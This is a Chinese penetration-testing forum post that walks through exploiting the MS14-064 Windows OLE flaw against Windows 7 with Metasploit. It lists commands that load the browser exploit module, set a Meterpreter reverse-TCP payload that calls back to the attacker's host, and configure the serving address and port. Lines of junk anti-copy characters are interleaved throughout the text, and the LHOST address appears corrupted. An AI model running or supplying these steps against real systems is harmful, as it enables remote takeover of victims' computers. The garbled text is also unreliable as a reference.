中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

* u4 ?2 R! r1 k# y1 j* U+ [# B 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示1 o3 Y$ P. p0 `/ E+ C3 M

- _9 S; s! h! K' z

! c0 J( r, p- m7 b. x 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: + m: y' m W0 B8 h$ Z

1 X7 Q$ }2 n$ ? _

4 t# K0 i5 r& w7 h- S 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 1 B: t9 I0 J9 t

+ x, T0 m& u' a1 R; _% s- l

+ p; M1 _1 d4 ?4 o# P& A+ n             set AllowPowershellPrompt true* i0 e# k* H) p' b3 ~0 D& i

6 r4 F( z, f, p- \2 f

* j A- U N. G. P+ a6 X6 r% h             Set LHOST 192.168.0.1098 X+ \( F# W$ X( h; v% g6 Z

8 A! F3 o5 v; M- d- j

3 F1 y# I: Z& b             set SRVHOST 192.168.0.109- _, S: l# S# O$ K# e

2 M6 I' E4 _4 c y% a) l

) N& T1 F* I, G- v2 V' V& N+ T             Set uripath share 3 v# ^# W# M. ^( N

7 B) F! ~; u1 Q3 q9 R

2 U8 V% W& o w& J- g4 S! c             Set srvport 80 $ S ^8 K8 |2 r2 @( o9 d

J, j8 r2 \6 ^' F7 e8 F

9 x, @+ v! A' X  0 A2 H* v) G% S- `) |: w

, ]9 w. Q$ D+ R9 ?/ S t% j) d) `

. R! \: G7 u: q  2 G8 m* ] k/ y

6 \, V& }, I Z$ }$ s7 @6 u2 E6 I$ b! Y

' y b2 p: e0 T" Q6 k) Z6 S1 d  # z' ^( g T$ ^

' x9 M, z: \8 g: t0 {1 b6 A1 j

; ~0 h6 B* I6 f. l: |6 J* |4 |) ]" M. M  & `' d6 n+ x/ M; k$ j5 \( Z2 C9 {

5 [) a- M) g$ a3 D y- @3 m: ^+ Y1 N

q6 X6 E" y) R" M   : `# x+ k1 ~( @

3 B& G7 v, `7 H Y. s* x# \

& ~( [2 ]% h" w1 \. J 下面我们来访问本地地址如图:3 }2 n* z: ~" A. b" Z

- Z) `1 S3 B; M k

( K _, T& ~+ Y, T* A/ d# s  . L8 e7 ~3 f i; J4 m

0 s$ T v, [* O* b; @/ w7 A

( f% M$ ~+ h. [# F r' r- Z   / ?1 T7 ~( m+ m. a, @

% l+ A* [- m/ }+ K) v+ u) G

6 s/ T( B) O; R5 Z. w6 g' ^' ~8 u / z4 t- p' e0 u- ?





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2